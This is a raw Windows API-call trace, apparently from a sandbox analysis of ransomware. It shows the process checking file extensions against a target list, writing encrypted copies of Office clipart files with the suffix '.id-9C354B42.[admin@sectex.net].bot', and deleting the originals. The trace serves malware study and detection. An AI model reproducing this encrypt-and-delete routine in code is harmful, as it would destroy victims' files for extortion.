	[0158.945] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.945] lstrlenW (lpString=".xlsx") returned 5
	[0158.945] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.945] lstrlenW (lpString=".ppt") returned 4
	[0158.945] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.945] lstrlenW (lpString=".zip") returned 4
	[0158.945] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.945] lstrlenW (lpString=".rar") returned 4
	[0158.945] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.945] lstrlenW (lpString=".bz2") returned 4
	[0158.945] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.945] lstrlenW (lpString=".7z") returned 3
	[0158.945] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.945] lstrlenW (lpString=".dbf") returned 4
	[0158.945] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.945] lstrlenW (lpString=".1cd") returned 4
	[0158.945] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.945] lstrlenW (lpString=".jpg") returned 4
	[0158.945] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.945] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.945] lstrlenW (lpString="J0105396.WMF") returned 12
	[0158.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105396.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0158.946] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=11012) returned 1
	[0158.946] CloseHandle (hObject=0x3d8) returned 1
	[0158.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105396.wmf")) returned 0x20
	[0158.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105396.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105396.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0158.947] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.947] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105396.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0158.947] GetLastError () returned 0x0
	[0158.947] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2b04, lpOverlapped=0x0) returned 1
	[0158.974] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2b10, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2b10, lpOverlapped=0x0) returned 1
	[0158.975] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.975] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.975] SetEndOfFile (hFile=0x3b8) returned 1
	[0158.975] CloseHandle (hObject=0x3b8) returned 1
	[0158.975] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.975] SetEndOfFile (hFile=0x3d8) returned 1
	[0158.977] CloseHandle (hObject=0x3d8) returned 1
	[0158.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.989] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105396.wmf")) returned 1
	[0159.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.005] lstrlenW (lpString=".doc") returned 4
	[0159.005] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.005] lstrlenW (lpString=".docx") returned 5
	[0159.005] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.005] lstrlenW (lpString=".pdf") returned 4
	[0159.005] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.005] lstrlenW (lpString=".xls") returned 4
	[0159.005] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.005] lstrlenW (lpString=".xlsx") returned 5
	[0159.005] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.005] lstrlenW (lpString=".ppt") returned 4
	[0159.005] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.005] lstrlenW (lpString=".zip") returned 4
	[0159.005] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.005] lstrlenW (lpString=".rar") returned 4
	[0159.005] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.005] lstrlenW (lpString=".bz2") returned 4
	[0159.005] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.005] lstrlenW (lpString=".7z") returned 3
	[0159.005] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.006] lstrlenW (lpString=".dbf") returned 4
	[0159.006] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.006] lstrlenW (lpString=".1cd") returned 4
	[0159.006] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.006] lstrlenW (lpString=".jpg") returned 4
	[0159.006] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.006] lstrlenW (lpString=".doc") returned 4
	[0159.006] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.006] lstrlenW (lpString=".docx") returned 5
	[0159.006] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.006] lstrlenW (lpString=".pdf") returned 4
	[0159.006] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.006] lstrlenW (lpString=".xls") returned 4
	[0159.006] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.006] lstrlenW (lpString=".xlsx") returned 5
	[0159.006] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.006] lstrlenW (lpString=".ppt") returned 4
	[0159.006] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.006] lstrlenW (lpString=".zip") returned 4
	[0159.006] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.006] lstrlenW (lpString=".rar") returned 4
	[0159.006] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.006] lstrlenW (lpString=".bz2") returned 4
	[0159.006] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.006] lstrlenW (lpString=".7z") returned 3
	[0159.007] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.007] lstrlenW (lpString=".dbf") returned 4
	[0159.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.007] lstrlenW (lpString=".1cd") returned 4
	[0159.007] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 63
	[0159.007] lstrlenW (lpString=".jpg") returned 4
	[0159.007] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.007] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.007] lstrlenW (lpString="J0105414.WMF") returned 12
	[0159.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105414.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.008] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=6244) returned 1
	[0159.008] CloseHandle (hObject=0x3d8) returned 1
	[0159.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105414.wmf")) returned 0x20
	[0159.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105414.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105414.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.008] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.008] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105414.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0159.011] GetLastError () returned 0x0
	[0159.011] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1864, lpOverlapped=0x0) returned 1
	[0159.057] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1870, lpOverlapped=0x0) returned 1
	[0159.058] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.058] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.058] SetEndOfFile (hFile=0x3b8) returned 1
	[0159.059] CloseHandle (hObject=0x3b8) returned 1
	[0159.059] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.059] SetEndOfFile (hFile=0x3d8) returned 1
	[0159.061] CloseHandle (hObject=0x3d8) returned 1
	[0159.061] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105414.wmf")) returned 1
	[0159.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.072] lstrlenW (lpString=".doc") returned 4
	[0159.072] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.072] lstrlenW (lpString=".docx") returned 5
	[0159.072] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.072] lstrlenW (lpString=".pdf") returned 4
	[0159.072] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.072] lstrlenW (lpString=".xls") returned 4
	[0159.072] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.072] lstrlenW (lpString=".xlsx") returned 5
	[0159.072] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.072] lstrlenW (lpString=".ppt") returned 4
	[0159.072] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.072] lstrlenW (lpString=".zip") returned 4
	[0159.072] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.072] lstrlenW (lpString=".rar") returned 4
	[0159.072] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.072] lstrlenW (lpString=".bz2") returned 4
	[0159.072] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.072] lstrlenW (lpString=".7z") returned 3
	[0159.072] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.072] lstrlenW (lpString=".dbf") returned 4
	[0159.072] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.073] lstrlenW (lpString=".1cd") returned 4
	[0159.073] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.073] lstrlenW (lpString=".jpg") returned 4
	[0159.073] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.073] lstrlenW (lpString=".doc") returned 4
	[0159.073] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.073] lstrlenW (lpString=".docx") returned 5
	[0159.073] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.073] lstrlenW (lpString=".pdf") returned 4
	[0159.073] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.073] lstrlenW (lpString=".xls") returned 4
	[0159.073] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.073] lstrlenW (lpString=".xlsx") returned 5
	[0159.073] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.073] lstrlenW (lpString=".ppt") returned 4
	[0159.073] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.073] lstrlenW (lpString=".zip") returned 4
	[0159.073] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.073] lstrlenW (lpString=".rar") returned 4
	[0159.073] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.073] lstrlenW (lpString=".bz2") returned 4
	[0159.073] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.073] lstrlenW (lpString=".7z") returned 3
	[0159.073] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.073] lstrlenW (lpString=".dbf") returned 4
	[0159.074] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.074] lstrlenW (lpString=".1cd") returned 4
	[0159.074] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 63
	[0159.074] lstrlenW (lpString=".jpg") returned 4
	[0159.074] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.074] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.074] lstrlenW (lpString="J0105504.WMF") returned 12
	[0159.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105504.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.084] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4148) returned 1
	[0159.084] CloseHandle (hObject=0x1b4) returned 1
	[0159.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105504.wmf")) returned 0x20
	[0159.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105504.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105504.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.121] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.121] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105504.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.122] GetLastError () returned 0x0
	[0159.122] ReadFile (in: hFile=0x1b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1034, lpOverlapped=0x0) returned 1
	[0159.153] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1040, lpOverlapped=0x0) returned 1
	[0159.155] ReadFile (in: hFile=0x1b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.155] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.155] SetEndOfFile (hFile=0x25c) returned 1
	[0159.155] CloseHandle (hObject=0x25c) returned 1
	[0159.155] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.155] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.157] CloseHandle (hObject=0x1b4) returned 1
	[0159.157] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.157] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105504.wmf")) returned 1
	[0159.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.182] lstrlenW (lpString=".doc") returned 4
	[0159.182] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.182] lstrlenW (lpString=".docx") returned 5
	[0159.182] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.182] lstrlenW (lpString=".pdf") returned 4
	[0159.182] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.182] lstrlenW (lpString=".xls") returned 4
	[0159.182] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.182] lstrlenW (lpString=".xlsx") returned 5
	[0159.182] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.182] lstrlenW (lpString=".ppt") returned 4
	[0159.182] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.182] lstrlenW (lpString=".zip") returned 4
	[0159.182] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.182] lstrlenW (lpString=".rar") returned 4
	[0159.182] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.183] lstrlenW (lpString=".bz2") returned 4
	[0159.183] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.183] lstrlenW (lpString=".7z") returned 3
	[0159.183] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.183] lstrlenW (lpString=".dbf") returned 4
	[0159.183] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.183] lstrlenW (lpString=".1cd") returned 4
	[0159.183] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.183] lstrlenW (lpString=".jpg") returned 4
	[0159.183] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.183] lstrlenW (lpString=".doc") returned 4
	[0159.183] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.183] lstrlenW (lpString=".docx") returned 5
	[0159.183] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.183] lstrlenW (lpString=".pdf") returned 4
	[0159.183] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.183] lstrlenW (lpString=".xls") returned 4
	[0159.183] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.183] lstrlenW (lpString=".xlsx") returned 5
	[0159.183] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.183] lstrlenW (lpString=".ppt") returned 4
	[0159.183] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
